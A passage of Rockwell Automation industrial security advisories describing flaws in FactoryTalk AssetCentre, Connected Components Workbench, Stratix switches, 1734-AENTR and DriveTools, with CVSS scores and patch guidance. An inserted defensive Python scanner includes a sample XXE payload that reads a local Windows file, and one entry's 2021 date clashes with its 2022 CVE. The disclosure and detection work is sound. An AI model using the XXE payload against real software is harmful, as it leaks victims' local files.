ControlLogix EtherNet/IP Module | 1756-EN2T/D, 1756-EN2TK/D, 1756-EN2TXT/D, 1756-EN2F/C, 1756-EN2FK/C, 1756-EN2TR/C, 1756-EN2TRK/C, 1756-EN2TRXT/C, 1756-EN3TR/B, 1756-EN3TRK/B, 1756-EN2TPK/A, 1756-EN2TPXT/A | Apply v11.001 or later.
ControlLogix EtherNet/IP Module | 1756-EN2TP/A | Apply v10.020 or later.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, that may be used to block unauthorized changes.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2016-20009

Critical
PN1559 | FactoryTalk AssetCentre Vulnerable to Arbitrary Code Execution
Published Date:
April 01, 2021
Last Updated:
April 01, 2021
CVE IDs:
CVE-2021-27466, CVE-2021-27460, CVE-2021-27474, CVE-2021-27468, CVE-2021-27470, CVE-2021-27462, CVE-2021-27464, CVE-2021-27476, CVE-2021-27472
Products:
FactoryTalk AssetCentre
CVSS Scores:
10
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – April 1, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding nine vulnerabilities in FactoryTalk® AssetCentre software. These vulnerabilities, if successfully exploited, may allow unauthenticated attackers to perform arbitrary command execution, SQL injection, or remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre, v10.00 and earlier.

Vulnerability Details

CVE-2021-27462: Deserialization of untrusted data in AosService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the AosService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27466: Deserialization of untrusted data in ArchiveService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the ArchiveService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27470: Deserialization of untrusted data in LogService.rem service may result in arbitrary command execution
A deserialization vulnerability exists in how the LogService.rem service in FactoryTalk AssetCentre verifies serialized data. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27474: Improperly restricted functions may result in loss of data integrity
FactoryTalk AssetCentre does not properly restrict all functions relating to IIS remoting services. This vulnerability may allow a remote, unauthenticated attacker to modify sensitive data in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27476: RACompareService service vulnerable to OS command injection
A vulnerability exists in the SaveConfigFile function of the RACompareService service that may allow for OS Command Injection. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary commands in FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27472: SearchService service vulnerable to SQL injection
A vulnerability exists in the RunSearch function of the SearchService service that may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27468: AosService.rem vulnerable to SQL injection
The AosService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27464: ArchiveService.rem vulnerable to SQL injection
The ArchiveService.rem service exposes functions that lack proper authentication. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary SQL statements.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE-2021-27460: Server deserialization of untrusted data in .NET remoting endpoints may lead to remote code execution
FactoryTalk AssetCentre components contain .NET remoting endpoints that deserialize untrusted data without sufficiently verifying that the resulting data will be valid. This vulnerability may allow a remote, unauthenticated attacker to gain full access to the FactoryTalk AssetCentre main server and all agent machines.

CVSS v3.1 Base Score: 10/10[Critical]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Vulnerability | Suggested Actions
CVE-2021-27462, CVE-2021-27466, CVE-2021-27470, CVE-2021-27474, CVE-2021-27476, CVE-2021-27472, CVE-2021-27468, CVE-2021-27464, CVE-2021-27460 | Apply FactoryTalk AssetCentre v11 or above (Download).

As an additional mitigation, customers who are unable to upgrade or are concerned about unauthorized client connections are encouraged to deploy IPsec, a built-in security feature of FactoryTalk AssetCentre. Users should follow the guidance found in QA46277. IPsec minimizes exposure to unauthorized clients and has been tested in FactoryTalk AssetCentre v9 – v11.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or a similar application allow-listing tool to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available in Knowledgebase Article QA17329.
  • Confirm that the least-privilege user principle is followed, and that user/service account access to shared resources (such as a database) is only granted with the minimum number of rights needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-091-01

Medium
PN1588 | File Parsing XML Entity in Multiple Products
Published Date:
March 28, 2021
Last Updated:
March 28, 2021
CVE IDs:
CVE-2022-1018
Products:
Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals
CVSS Scores:
5.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – March 28, 2021

Executive Summary

Rockwell Automation received a report from the researcher Kimiya, through Trend Micro's Zero Day Initiative, identifying a vulnerability in Connected Components Workbench, ISaGRAF Workbench and Safety Instrumented Systems Workstation for AADvance and Trusted controllers. If successfully exploited, this vulnerability may result in information leakage and loss of confidentiality. It requires user interaction, for example through a phishing attack, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • Connected Components Workbench version 12.00 and below
  • ISaGRAF Workbench 6.6.9 and below
  • Safety Instrumented Systems Workstation 1.1 and below

Vulnerability Details

CVE-2022-1018: XML External Entity Leads to Information Leak

When opening a malicious solution file provided by an attacker, the application suffers from an XML External Entity vulnerability due to an unsafe call within a dynamic link library file.

As a result, this could be exploited to pass data of local files of the victim to a remote web server controlled by an attacker leading to a loss of confidentiality.

CVSS v3.1 Base Score: 5.5/10 [Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
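The finding above is a classic XXE: the solution file carries a DTD that declares an external entity, the application's XML parser resolves it, and the contents of a local file end up in the parsed document or in a request to an attacker-controlled server. The Python below is an added example written for this page, not Rockwell Automation code; the solution-file layout and file names are a stand-in, since the advisory does not describe the real format. It shows a pre-open check that refuses any file declaring an external entity, without ever fetching one, so the scanner itself cannot be turned into the exfiltration channel.

```python
"""Pre-open scan of an XML solution/project file for external entities.

Added example, not Rockwell Automation code.  The solution file layout is a
stand-in (assumption: the advisory does not describe the real format); the
check is generic.  An XXE payload needs an external (SYSTEM or PUBLIC)
entity declaration in the file's DTD, so a file that declares one is
refused before the application's own parser ever sees it.
"""
import xml.parsers.expat


def external_entities(xml_bytes: bytes) -> list:
    """Return (entity_name, system_id) for every external entity declared."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones carry a
        # SYSTEM and/or PUBLIC identifier instead.  Parameter entities (the
        # usual vehicle for out-of-band exfiltration via a remote DTD) are
        # reported through this same handler.
        if system_id is not None or public_id is not None:
            found.append((name, system_id))

    def on_external_ref(context, base, system_id, public_id):
        # Report "handled" and expand nothing: the entity is never fetched,
        # so scanning a hostile file cannot read local files or reach out.
        return 1

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)
    return found


def is_safe_to_open(xml_bytes: bytes) -> bool:
    """Policy: refuse files that declare external entities or are not well-formed."""
    try:
        return not external_entities(xml_bytes)
    except xml.parsers.expat.ExpatError:
        return False


# Constructed samples, not real product files.
BENIGN_SOLUTION = b"""<?xml version="1.0"?>
<Solution Name="Pump3"><Device Catalog="2080-LC50"/></Solution>"""

XXE_SOLUTION = b"""<?xml version="1.0"?>
<!DOCTYPE Solution [
  <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<Solution><Name>&xxe;</Name><Device Catalog="2080-LC50"/></Solution>"""

if __name__ == "__main__":
    print(external_entities(XXE_SOLUTION))
    print(is_safe_to_open(BENIGN_SOLUTION), is_safe_to_open(XXE_SOLUTION))
```

The check is deliberately coarse: a legitimate project file has no reason to declare external entities at all, so rejecting every declaration is simpler and safer than trying to judge individual system identifiers. The durable fix is the one the vendor shipped, a parser configured not to resolve external entities; the scan is a gate for files that still have to be opened with an unpatched version.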

Risk Mitigation & User Action

Customers using the affected versions of this software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product | Suggested Actions
Connected Components Workbench version 12.00 and below | Customers should update to version 13.00, which mitigates this vulnerability.
ISaGRAF Workbench 6.6.9 and below | It is recommended that customers follow the guidelines below until a patch is available.
SIS Workstation 1.1 and below | Customers should update to version 1.2, which mitigates this vulnerability.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench, ISaGRAF Workbench and SIS Workstation as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted files with Connected Components Workbench, ISaGRAF Workbench or SIS Workstation. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use Microsoft AppLocker or a similar application allow-listing tool to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Ensure that the least-privilege user principle is followed, and that user/service account access to shared resources (such as a database) is only granted with the minimum number of rights needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2022-1018

High
PN1558 | Stratix Switches Impacted by IOS and IOS XE Software Vulnerabilities
Published Date:
March 26, 2021
Last Updated:
March 26, 2021
CVE IDs:
CVE-2021-1452, CVE-2021-1442, CVE-2021-1443, CVE-2021-1392, CVE-2021-1403, CVE-2021-1220, CVE-2021-1352
Products:
Stratix 5400 Industrial Ethernet Switch, Stratix 8300 L3 Modular Managed Switch, Stratix 5410 Ind Distribution Switch, Stratix 8000 Modular Managed Switch
CVSS Scores:
7.8, 7.4, 6.8, 4.3, 5.5, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 - March 26, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Cisco regarding eight vulnerabilities in Stratix® switches. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, unauthorized privilege escalation, web socket hijacking, relative path traversal or command injection.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

CVE ID | Affected Product Family | Affected Versions
CVE-2021-1392 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1392 | Stratix 8000, Stratix 5700, Stratix 5410, Stratix 5400 | 15.2(7)E3 and earlier
CVE-2021-1392 | Stratix 8300 | All versions
CVE-2021-1403 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1352 | Stratix 5800 | 17.04.01 and earlier, if DECnet is enabled
CVE-2021-1442 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1452 | Stratix 5800 | 16.12.01 and earlier
CVE-2021-1443 | Stratix 5800 | 17.04.01 and earlier
CVE-2021-1220, CVE-2021-1356 | Stratix 5800 | 17.04.01 and earlier

Vulnerability Details

CVE-2021-1392: IOS and IOS XE Software Common Industrial Protocol (CIP) Privilege Escalation Vulnerability
A vulnerability in the CLI command permissions of Cisco® IOS and Cisco IOS XE software could allow an authenticated, local attacker to retrieve the password for Common Industrial Protocol (CIP™) and then remotely configure the affected device as an administrative user.

CVSS v3.1 Base Score: 7.8/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1403: IOS XE Software Web UI Cross-Site WebSocket Hijacking Vulnerability
A vulnerability in the web UI feature of Cisco IOS XE software could allow an unauthenticated, remote attacker to conduct a cross-site WebSocket hijacking (CSWSH) attack and cause a denial of service (DoS) condition on an affected device.

CVSS v3.1 Base Score: 7.4/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H

CVE-2021-1352: IOS XE Software DECnet Phase IV/OSI Denial of Service Vulnerability
A vulnerability in the DECnet protocol processing of Cisco IOS XE software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. An attacker could exploit this vulnerability by sending DECnet traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.

This vulnerability affects Stratix 5800 devices if they are running a vulnerable release of Cisco IOS XE software and have the DECnet protocol enabled. DECnet is not enabled by default.

CVSS v3.1 Base Score: 7.4/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2021-1442: IOS XE Software Plug-and-Play Privilege Escalation Vulnerability
A vulnerability in a diagnostic command for the Plug and Play (PnP) subsystem of Cisco IOS XE software could allow an authenticated, local attacker to elevate privileges to the level of an Administrator on an affected Stratix 5800.

Plug and Play is disabled after Express Setup has completed.

CVSS v3.1 Base Score: 7.0/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1452: IOS XE ROM Monitor Software OS Command Injection Vulnerability
A vulnerability in the Stratix 5800 switches could allow an unauthenticated, physical attacker to execute persistent code at boot time and break the chain of trust.

CVSS v3.1 Base Score: 6.8/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1443: IOS XE Software Web UI OS Command Injection Vulnerability
A vulnerability in the web UI of the IOS XE software could allow a remote, authenticated attacker to execute arbitrary code with root privileges on the underlying operating system of the affected device. To exploit this vulnerability, an attacker would need to have Admin credentials to the device.

CVSS v3.1 Base Score: 5.5/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVE-2021-1220/CVE-2021-1356: IOS XE Software Web UI Denial-of-Service Vulnerabilities
Multiple vulnerabilities in the Web UI feature of IOS XE software could allow an authenticated, remote attacker with read-only privileges to cause the web management software to hang and consume vty line instances resulting in a denial-of-service (DoS) condition.

CVSS v3.1 Base Score: 4.3/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected Stratix devices are encouraged to update to an available firmware revision that addresses the associated risk.

Where a fix is not yet available, customers are directed towards the risk mitigation strategies provided below, and are encouraged, when possible, to apply general security guidelines to employ multiple strategies simultaneously.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available.
CVE ID | Affected Product Family | Affected Firmware Versions | Suggested Actions
CVE-2021-1392 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1392 | Stratix 8000, Stratix 5700, Stratix 5410, Stratix 5400 | 15.2(7)E3 and earlier | Confirm that the least-privilege user principle is followed, and that user accounts are granted only the minimum rights needed.
CVE-2021-1392 | Stratix 8300 | All versions | Migrate to a contemporary solution.
CVE-2021-1403 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1352 | Stratix 5800 | 17.04.01 and earlier, if DECnet is enabled | If possible, disable the DECnet protocol completely or on selected interfaces. To reduce risk, customers should confirm that they employ proper network segmentation and security controls: network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices on deploying network segmentation and broader defense-in-depth strategies.
CVE-2021-1442 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1452 | Stratix 5800 | 16.12.01 and earlier | Apply version 17.04.01 or later.
CVE-2021-1443 | Stratix 5800 | 17.04.01 and earlier | Confirm that the least-privilege user principle is followed, and that user accounts are granted only the minimum rights needed.
CVE-2021-1220, CVE-2021-1356 | Stratix 5800 | 17.04.01 and earlier | Confirm that the least-privilege user principle is followed, and that user accounts are granted only the minimum rights needed.

General Security Guidelines


Network-based Vulnerability Mitigations for Embedded Products
  • Use proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, which may be used to block unauthorized changes.
Software/PC-based Mitigation Strategies
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
General Mitigations
  • Use trusted firmware, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

High
PN1551 | PN1551 | 1734-AENTR Series B and Series C Contains Multiple Web Vulnerabilities
Published Date:
March 04, 2021
Last Updated:
March 04, 2021
CVE IDs:
CVE-2020-14504, CVE-2020-14502
Products:
1734 Point I/O
CVSS Scores:
7.5, 4.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 1.0 – March 4, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Adam Eliot of the Loon Security Team regarding two vulnerabilities in the web interface of the 1734-AENTR Series B and Series C communications module. If successfully exploited, these vulnerabilities may lead to data modification on the device.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1734-AENTR Series B, versions 4.001 to 4.005, and 5.011 to 5.01.
1734-AENTR Series C, versions 6.011 and 6.012.

Vulnerability Details

CVE-2020-14504: Unauthenticated HTTP POST Requests
The web interface of the 1734-AENTR communication module mishandles authentication for HTTP POST requests. A remote, unauthenticated attacker can send a crafted request which may allow for modification of the configuration settings.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-14502: Stored Cross Site Scripting (XSS)
The web interface of the 1734-AENTR Communications module is vulnerable to stored XSS. A remote, unauthenticated attacker could store a malicious script within the web interface that, when executed, could modify some string values on the “Home” page of the web interface.

CVSS v3.1 Base Score: 4.7/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Risk Mitigation & User Action

Customers using the affected 1734-AENTR Series B and Series C are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details | Recommended User Actions
CVE-2020-14504, CVE-2020-14502 | 1734-AENTR Series B, update to firmware version 5.018 (Download). 1734-AENTR Series C, update to firmware version 6.013 (Download).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.

General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

High
PN1543 | PN1543 | Writable Path Directory in DriveTools SP and Drives AOP
Published Date:
February 15, 2021
Last Updated:
February 15, 2021
CVE IDs:
CVE-2021-22665
Products:
9303 DriveTools SP
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No


Revision History
Revision Number
1.1

Executive Summary

Rockwell Automation received a report from both Cim Stordal of Cognite and Claroty regarding a vulnerability in DriveTools™ and Drives AOP. If successfully exploited, this vulnerability may result in privilege escalation and total loss of device confidentiality, integrity, and availability.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to both Cognite and Claroty for their work discovering this vulnerability.

Affected Products

DriveExecutive v5.13 and below.
DriveTools SP v5.13 and below.
Drives AOP v4.12 and below.

Vulnerability Details

CVE-2021-22665: Privilege Escalation Vulnerability due to Uncontrolled Search Path Element
DriveTools and Drives AOP both contain a vulnerability that a local attacker with limited privileges may be able to exploit resulting in privilege escalation and complete control of the system.

CVSS v3.1 Score: 7.5/10 High
CVSS v3.1 Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability | Suggested Actions
CVE-2021-22665 | Apply DriveTools SP v5.14 or later (Download). Apply Drives AOP v4.13 or later (Download).

Customers using affected versions can reach out to their account manager or distributor to request a newer version.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide



High
PN1531 | PN1531 | 1794-AENT Flex I/O Series B Contains Multiple Denial of Service Vulnerabilities
Published Date:
February 02, 2021
Last Updated:
February 02, 2021
CVE IDs:
CVE-2020-6085, CVE-2020-6084, CVE-2020-6088, CVE-2020-6083, CVE-2020-6087, CVE-2020-6086
Products:
Flex I/O, 1794 Flex, 1794/5094 Distributed I/O
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Version 2.0 – February 2, 2021. Updated Risk Mitigation & User Actions.
Version 1.1 – November 4, 2020. Updated Vulnerability Details.
Version 1.0 – October 12, 2020. Initial Version.


Executive Summary

